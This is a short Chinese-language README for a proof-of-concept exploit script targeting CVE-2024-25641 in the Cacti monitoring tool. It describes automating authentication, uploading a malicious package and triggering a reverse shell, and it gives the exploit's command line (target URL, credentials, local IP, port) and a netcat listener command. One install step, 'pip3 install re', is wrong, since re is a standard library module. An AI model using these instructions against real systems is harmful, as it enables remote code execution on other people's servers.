该脚本是针对Cacti(一个基于Web的监控工具)中CVE-2024-25641漏洞的概念验证(PoC)。脚本自动执行与应用程序的身份验证、上传恶意包以及触发反向Shell的过程。
requests 库argparse 库re 库你可以使用pip3安装所需的Python库:
pip3 install requests
pip3 install argparse
pip3 install re
(确保将 test.xml.gz 放在与 exploit.py 相同的目录中)
python3 exploit.py --url <目标URL> -u <用户名> -p <密码> -i <本地IP> -l <端口> [--proxy]
nc -nvlp <端口>